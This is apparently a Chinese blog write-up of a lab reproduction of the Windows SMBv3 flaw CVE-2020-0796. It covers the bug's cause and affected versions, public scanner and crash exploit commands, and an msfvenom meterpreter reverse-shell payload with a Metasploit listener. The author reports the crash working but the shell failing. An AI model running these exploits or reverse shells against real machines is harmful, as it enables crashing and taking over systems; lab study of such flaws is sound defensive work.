漏洞复现_CVE-2020-0796 永恒之黑漏洞_遇坑_已解决

漏洞简介

永恒之黑漏洞与“永恒之蓝”漏洞极为相似，都是利用 “Windows SMB服务” 漏洞远程攻击获取系统最高权限。

漏洞危害等级：高危

“永恒之黑”漏洞高危之处在于对SMB客户端的攻击，攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等，向攻击目标发送，一旦被攻击者打开则瞬间触发漏洞受到攻击。

攻击原理：
本漏洞源于SMBv3没有正确处理压缩的数据包，在解压数据包的时候使用客户端传过来的长度进行解压时，并没有检查长度是否合法，最终导致整数溢出。利用该漏洞，攻击方可直接远程攻击SMB服务端远程执行任意恶意代码，亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒之黑一旦被成功利用，其危害不亚于永恒之蓝。

漏洞成因：
CVE-2020-0796 漏洞存在于受影响版本的 Windows 驱动 srv2.sys 中，由于 Windows SMB 更新到 3.1.1 版本增加了对压缩数据的支持，未对用户传输的压缩数据的合法性进行校验。

受影响的Windows版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

环境准备

1 一个受影响的windows版本
我准备的是Windows10 1903企业版 64位（特地自己装了一下）
需要镜像的建议去https://msdn.itellyou.cn网站下载自己需要的。

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
确认当前作为靶机的Windows系统是受影响的版本

Windows版本，按win+r，在弹出运行窗口中，输入 winver

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

其次要开启SMB服务：
win10如何开启SMB服务？
1、“win+R”快捷键弹出运行窗口，输入control确定；

2、在弹出窗口点击“程序”；

3、在弹出窗口点击“启用或关闭Windows功能”；

4、在弹出窗口点击“SMB 1.0/CIFS文件共享支持”进行全选，确定；

5、在弹出窗口等待搜索需要的文件，接着会自动进行功能启用；

6、在弹出窗口如图下，重启电脑即可（请保存好所打开文件再进行重启）；

2 正常的电脑（也是win,因为要执行exe文件）

靶机IP：172.16.135.138
攻击机IP：172.16.135.137

利用流程

【1】使用奇安信的漏洞探测工具

直接在cmd中启动 CVE-2020-0796-Scanner.exe
（建议不要双击打开，否则容易“闪退”）

根据提示输入扫描目标IP 或者扫描IP范围

（这里为了方便，直接扫172.16.135.138-172.16.135.142）

【2】准备蓝屏payload
使用CVE-2020-0796 蓝屏工具进行攻击

python3 CVE-2020-0796.py <查询到存在漏洞的IP>

python3 CVE-2020-0796.py 172.16.135.138

如果靶机没有蓝屏就重新攻击一下（第1坑：kali的3.9一直不行，换了真机的3.10就可以了）
真机复现：

python3.9
用kali，死活不跳转

用虚拟机win10:

检测的其他方法

除了用奇安信的漏洞探测工具CVE-2020-0796-Scanner.exe，还可以尝试：SMBGhost

（1）SMBGhost

下载地址：https://github.com/ollypwn/SMBGhost

下载：

git clone https://github.com/ly4k/SMBGhost.git

扫描：

python3 scanner.py <IP>

（2）使用蓝屏payload，验证漏洞

蓝屏POC地址：https://github.com/chompie1337/SMBGhost_RCE_PoC

安装：

git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

用法

python exploit.py -ip 192.168.142.131

不成功的建议切换python版本。（坑点2:用python3.9就无法复现，但是3.10就可以）
下图是我用3.10复现成功的

但是3.9就不行：

要么是：

。。。。

利用msf生成exp反弹shell

首先

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.135.203 lport=1335 -b '\x00' -f python

各个参数的意义：

-p 指定需要使用的payload(攻击荷载)是windows/x64/meterpreter/bind_tcp
lport 指定端口
-b   设定规避字符集，比如: '\x00\xff'避免使用的字符
-i    指定payload的编码次数
-f   指定输出格式

然后结合SMBGhost_RCE_PoC-master进行攻击。
注意：
SMBGhost_RCE_PoC-master中的exploit.py 原文件不能直接用来攻击，需要修改其中的 USER_PAYLOAD 部分；

启动msf
msfconsole

使用监听模块：
use exploit/multi/handler
设置payload
set payload windows/x64/meterpreter/reverse_tcp
配置options
然后run

然后回到SMBGhost_RCE_PoC-master进行攻击：
python3 exploit.py -ip

然后按回车就得到shell
反正蓝屏是得到了：

但是没有得到shell,然后我又换了一台Kali,还是不行…
后来问了一个大佬，说这个洞本身可以弹shell，但是不是很稳定。用的也不是很多。

应该是靶机问题。换个真正有问题的靶机能够复现。